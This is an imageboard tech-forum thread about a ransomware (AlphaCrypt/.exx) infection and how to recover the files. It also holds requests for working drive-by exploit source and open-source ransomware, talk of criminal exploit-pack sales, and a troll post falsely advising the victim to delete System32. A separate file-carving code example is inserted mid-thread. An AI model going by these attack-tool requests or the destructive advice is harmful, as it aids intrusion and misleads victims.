>> No.47966049

There is nothing wrong with running java, all security issues have been fixed for years now.

>> No.47966154

>nothing wrong with running java
Not to worry you or anything.
Plus I know of at least 3 exploit packs that currently use java to do driveby attacks.

Go get mbam, clean off the virus and pray that someone has the actual cryptware reversed and they fucked up the key generation part.

>> No.47966202

are those drivebys public yet?

>> No.47966229

Not to my knowledge but they operate mainly in russia and taiwan right now, I know the people who sell them, it's a huge business and that's how they get by, buying 0 days and reselling them in a pack so that less experienced people can run botnets and be charged while they don't really get caught.

>> No.47966246

alright, what is mbam?

if they fucked up the key generation part, it would be easier for the reversed cryptware to turn the files back to normal?

>> No.47966260

I've been out of the loop for a while, you might be able to point me in the right direction.
Do you know of any drivebys that still work that have the source published? I don't care if it's silent or not.

>> No.47966265

Get the free one, use it to clean your pc up, and yes if they fucked up the encryption part and someone reversed it there might be hope for your files but that's a 1/1000 chance.

>> No.47966275

OP you need to delete system 32.

It's the file that allows encryptions to exist and without it your files will be automatically decrypted.

>> No.47966281

I think only one in the three is silent the other two require user input, tbh they don't sell to just anyone so you'd need to make a name in some of the underground botnet places. It's not open source and costs a fair bit though.

>> No.47966306

call geeksquad. nothing dumber than some kid trying to act smart on /g/ by posting stupid steps and shit no one would ever think to try without having access to the computer

you are all fucking retards

>> No.47966316

>And smallpox is still a problem despite being eradicated entirely. Just like polio
well with anti-vaxxers nowadays...

>> No.47966328

Except this is a typical crypto locker case and he is genuinely fucked if it's not one of the reversed and fixed ones.

You're mighty fucking idiotic if you think the underpaid underqualified asshat at geeksquad can fix this.

>> No.47966330

You're still talking about the good versions, I'm looking for something that is old, not particularly useful for anything other than getting one or two installs.

I kinda want to just brush up on the whole topic, I'm personally more interested in the coding behind everything than actually running a net.
Java isn't my thing, I much prefer C/C++, all I was able to find in jdbs a while back was some outdated stuff that won't even run anymore.

>> No.47966366

here you go, most of them work like this.
This is outdated and most browsers will scream at you if they load it but the basics are there.

>> No.47966372

>call geeksquad
>pretending to be better than others when your first step is to whine to the useless idiots at geeksquad

>> No.47966373

Where could I find an open source cryptolocker/ransomware?

>> No.47966426
File: 3 KB, 560x88, back.png

Thanks for reminding me a backup was overdue.

And this is what you get for pirating games/software. Pay for it, like you're supposed to, and this won't happen.

Creators deserve money for the things they produce.

>> No.47966442
File: 31 KB, 240x160, 2215 - Fire Emblem - The Sacred Stones (E)(Rising Sun).st1.png

You deserved it, you fucking retard. DBAN that shit and install a real OS, like GNU/Linux or FreeBSD.

>> No.47966473

You get what you deserve

>> No.47966499

I'm about to sound like a scrub... So does this one actually require Metasploit to be installed, or is this using Metasploit to generate the actual driveby that is hosted on the server?

>> No.47966513

>all these hurrudhurhdr use linux posts in the same thread
i'd ask if linux users get bored but then i remember they're using linux

>> No.47966515

Meh, most cryptolocker versions don't even spread through torrents, tbh I would be more inclined to say that it's a driveby or fake software download site that got OP.

They are technically file encrypter and decrypter combos that get the key from a server instead of the user, the only hard part about them is making them small enough and fast enough to be spreadable efficiently.

>Linux doesn't have viruses
Sure there are fewer user-targeted ones, but there are infinitely more rootkits targeting Linux servers than Windows servers.

This one runs on the metasploit framework, you really should read up before attempting to set up a driveby if you are unfamiliar with metasploit.

>> No.47966545

I never said linux doesn't have viruses. OP deserves this because he's an unethical piece of shit

>> No.47966555
File: 845 KB, 300x300, 1410128289765.gif


>> No.47966568

At least you called it Linux, as you should have called the Linux operating system.

>> No.47966583

I'll read up on it. I'm under the impression it's a tool that does the work for you, kind of like, I can't even think of a good comparison, I guess like a printer vs a painter in making a picture, or like using cPanel instead of ssh and not even knowing how to use ssh.

Thanks for the link

>> No.47966598

It builds and puts the exploit up but you can read the source for the driveby in the exploit source, you just need to understand how metasploit puts them together.

>> No.47966611


Pay for your software, dirty pirate.


Yeah I know, I'm just being antagonistic for fun.

>> No.47966613

got you

>> No.47966620

Hi there!

You seem to have made a bit of a mistake in your post. Luckily, the users of 4chan are always willing to help you clear this problem right up! You appear to have used a tripcode when posting, but your identity has nothing at all to do with the conversation! Whoops! You should always remember to stop using your tripcode when the thread it was used for is gone, unless another one is started! Posting with a tripcode when it isn't necessary is poor form. You should always try to post anonymously, unless your identity is absolutely vital to the post that you're making!

Now, there's no need to thank me - I'm just doing my bit to help you get used to the anonymous image-board culture!

>> No.47966664

Have you simply tried ignoring tripfags ?
Will I have to enable recursive filtering to truly get rid of the attention seeking fags ?

>> No.47966726

>Have you simply tried ignoring tripfags ?

He gets paid to do this.

>> No.47966732

How much ? I want in on the cash.

>> No.47966869

Use the secret NSA back door to decrypt it

>> No.47966935

Isn't there anything to increase this chance?

I'm pretty sure this guy is trolling, but just want anyone to confirm it

>> No.47966939

Good point.
There are servers that won't upgrade even for security purposes.
But for most everyone, putting a monthly apt upgrade into cron keeps the malware away, and they know it.
Even debian has a security line.

>> No.47967002

Sorry to break it to you but that one hasn't been broken yet and I assume you don't have a backup so it's safe to assume all your files are lost.
exx is an alphacrypt variant and unless you are willing to pay the ransom your files are dead.

>> No.47967022

although before you do try this, if the encryption method is the same you might still have some luck

>> No.47967033

If only we could wipe you and get a backup from before when you were a massive faggot.

Oh wait, such a thing doesn't exist.

>> No.47967052

How can I be sure that after I pay the ransom I will get anything back? Also, I'm not into financing such low methods of money making. Better tell me something more about alphacrypt: how do you know it is exactly alphacrypt, and what is the best method/program to decrypt it? Earlier a guy mentioned the key is in the Windows Registry?

>> No.47967090

because the encryptor alphacrypt uses makes everything into .exx, and you can't be sure.
The key isn't in the registry, actually the key never even was in the registry, it was briefly in the memory of the malware while it encrypted the files and then it never needs it again.

Try the TeslaDecrypt thing I just sent if that fails you are out of options.

>> No.47967095

>hands shaking

isn't this a copypasta variation of the dude that finds his gf cheating in the other room?

>> No.47967097
File: 50 KB, 600x540, 1430081456050.jpg

>/g/ - Technology
>windows retards catching viruses

this board should die swiftly.

>> No.47967109

>Yotsuba on Yotsuba B
Eck my eyes

>> No.47967132

Well, my best friend says I'm never out of options, but it seems you are right. Is it safe to copy a few photos onto a USB flash drive and then install TeslaDecrypt on another PC and try to decrypt them from there? I mean, the files are only encrypted, not infected... right?

>> No.47967222

Worst case scenario, take out hard drive, and wait a few years. Hopefully by then, someone has found a way to reverse encryption, or processing power has increased to a point where this stuff can be decrypted.

>> No.47967356

Thank you very much, this information seems handy.

This was my last measure. I never thought this encryption problem could be so serious. I figured since we can bring deleted files back we can do anything, it's 2015 after all, but it seems I have underestimated it... a lot...

>> No.47967506

Anytime man, when I had it happen to me I got a nice recovery program to do a deep scan on it, I had the infected drive slaved and all the recovered files were put onto the clean drive.
Cryptowall actually makes copies of the files, encrypts those and then deletes the unencrypted files. If you simply slave that drive on a clean computer you can recover the files, and then bomb the infected drive back to the stone age. I did a DOD standard wipe.
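
The recovery route described in the post above (encrypted copies written, unencrypted originals deleted, then a deep scan run from a clean machine) relies on signature-based file carving. The sketch below is an added example of that principle, not part of the thread and not the implementation of Recuva or any other named tool; the disk image is constructed, with made-up file bodies that carry real JPEG/PNG magic bytes.

```python
# Header/footer signatures of real JPEG and PNG files.
SIGNATURES = {
    "jpeg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
}
MAX_SIZE = 4096  # carve window for this small sample; real tools allow far more


def carve(image, max_size=MAX_SIZE):
    """Scan a raw image for deleted files by signature.

    Returns (recovered, truncated):
      recovered: [(offset, kind, data)] where header and footer both survive
      truncated: [(offset, kind)] where the footer is gone (tail overwritten)
    Assumes each file was stored contiguously (no fragmentation).
    """
    recovered, truncated = [], []
    for kind, (header, footer) in SIGNATURES.items():
        pos = image.find(header)
        while pos != -1:
            window = image[pos:pos + max_size]
            end = window.find(footer, len(header))
            if end == -1:
                truncated.append((pos, kind))
                nxt = pos + len(header)
            else:
                data = window[:end + len(footer)]
                recovered.append((pos, kind, data))
                nxt = pos + len(data)
            pos = image.find(header, nxt)
    return sorted(recovered), sorted(truncated)


def filler(n):
    # Constructed stand-in for unrelated disk content (including the newly
    # written encrypted files). Values stay below 0xFF and step by 37, so it
    # can never contain one of the signatures by accident.
    return bytes((i * 37 + 11) % 251 for i in range(n))


def build_sample_image():
    # Constructed sample: two deleted files that are still intact, and one
    # whose tail was overwritten by data written after the deletion.
    jpeg_a = b"\xff\xd8\xff\xe0" + b"constructed photo A" + filler(400) + b"\xff\xd9"
    png_b = b"\x89PNG\r\n\x1a\n" + b"constructed image B" + filler(250) + b"IEND\xaeB`\x82"
    jpeg_c_head = b"\xff\xd8\xff\xe0" + b"constructed photo C" + filler(100)
    image = (filler(300) + jpeg_a + filler(200) + png_b + filler(100)
             + jpeg_c_head + filler(5000))
    return image, jpeg_a, png_b


if __name__ == "__main__":
    image, _, _ = build_sample_image()
    recovered, truncated = carve(image)
    for offset, kind, data in recovered:
        print(f"recovered {kind} at offset {offset}: {len(data)} bytes")
    for offset, kind in truncated:
        print(f"{kind} header at offset {offset} but no footer: tail overwritten")
```

The truncated entry is the reason to stop writing to the affected drive and scan it from another machine: every new write can land on the space a deleted original still occupies.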

>> No.47967554

For friendly fellas like you, I still visit 4chan, the nice recovery program you got yourself was Cryptowall right?

>> No.47967708

No. Cryptowall is the virus. Use a program like Recuva, which recovers deleted files

>> No.47967768

But there are no deleted files on my HDD, only thousands of encrypted ones

>> No.47967853

>Cryptowall actually makes copies of the files, encrypts those and then deletes the unencrypted files.

I got what you were saying, so all of my files, have been deleted and replaced with encrypted ones with similar size, and now only thing I have to do is, get a decent recovery software

>> No.47968800

Thank you all for trying. Next thing I will try is TeslaDecrypt, and if nothing, ShadowExplorer and finally Recuva

>> No.47968965


that's what happens when you listen to /g/'s bullshit "hurr durr common sense" faggotry.

>> No.47969278

What are you talking about? Common Sense 2015 is just decent anti-virus software
